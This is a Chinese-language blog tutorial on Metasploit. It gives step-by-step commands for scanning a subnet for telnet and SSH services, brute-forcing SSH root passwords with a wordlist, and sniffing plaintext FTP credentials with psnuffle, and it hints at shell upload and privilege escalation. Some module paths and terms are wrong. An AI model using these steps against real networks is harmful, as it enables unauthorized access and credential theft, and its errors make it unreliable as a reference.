Metasploit學習三常見的服務掃描與口令猜解

有的時候我們利用了Nmap發現了端口和服務器上的服務器,然而我們並不是專業的hack,很多時候或許我們只能破FTP 共享和telnet,雖然夠低端,但是如果你已經在一個局域網中了,上面3個服務器必然會存在。

利用telnet來掃描

>search telnet_version  查找telnet掃描模塊

>use auxiliary/scanner/telnet/telnet_version  使用該模塊

>set RHOSTS 192.168.1.0/24 進行整個網段掃描

>set THREADS 100 設置線程,這個數值可以自己定義

>run

利用ssh來掃描


>search ssh_version  查找ssh掃描模塊

>use auxiliary/scanner/telnet/ssh_version  這個版本可能是其他的

>set RHOSTS 192.168.1.0/24 進行整個網段掃描

>set THREADS 100 設置線程,這個數值可以自己定義

>run

利用services來進行掃描的方法都是大同小異,如果想利用其他的services進行掃描,可以先

>search name_version 掃描出具體支持哪些服務,當然這是個積累的過程,常用的掃描還有oracle Mssql mysql等等,當然其實很多時候我們都是在抓瞎,Nmap足以解決問題了,更多的時候我們使用這個工具就是爲了後面的猜解和監聽做準備,下面就講解一些猜解方法。

SSH服務口令猜解

SSH服務器相當於windows下的FTP,我想多數管理員是不會配置密碼的,因爲SSH可以通過公鑰配對加密和驗證的,而且很難猜解,當然也許有的管理員就設置了賬戶密碼,這樣的時候我們就可以利用下面的命令進行猜解了,當然你得有一張足夠大的彩虹表

>search ssh 如果熟練了可以直接敲路徑了,反正我是記不住,而且模塊衆多,短時間很難掌握全。

>use auxiliary/scanner/ssh/ssh_login 選擇ssh口令猜解模塊

>set RHOSTS 192.168.1.105 設置hosts

>set USERNAME root    設置用戶名爲root

>set set PASS_FILE/root/password.txt 這個字典自己做啦,工具很多,好壞就在於字典了

>set THREADS 50 設置線程數,這個設置多了可能會死機,會拒絕服務,設置少了猜解會慢

>run

因爲我不會拿自己的職業生涯開玩笑,所以我只在我自己搭建的環境下試驗過,所以效果如何不敢評價,總是不太好吧。

FTP嗅探工具psnuffle

這個工具是嗅探明文傳送的FTP的,所以所見即所得,內網破解很實用,尤其是在win系統下,如果是利用IIS搭建的FTP服務,那麼你嗅探到的賬戶肯定具有user權限,而後怎麼提權就自己想去吧,如果利用FTP軟件,這個賬戶即使得到個人感覺用處也不大,除非可以獲得寫權限,這樣可以上傳shell.好吧,不多講了,看下psnuffle這個繞口的工具的使用方法:

>use auxiliary/sniffer/psnuffle

>run

當然你如果確定了端口也可以進行一些限制,使用set命令就好,這個嗅探可能需要開那麼幾個小時,因爲誰也不知道啥時候會有人登陸FTP,有的時候我在局域網了,我寧願做DNS欺騙,感覺這樣更加簡單暴力,當然,也許直接就被防火牆抓了,呵呵




發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章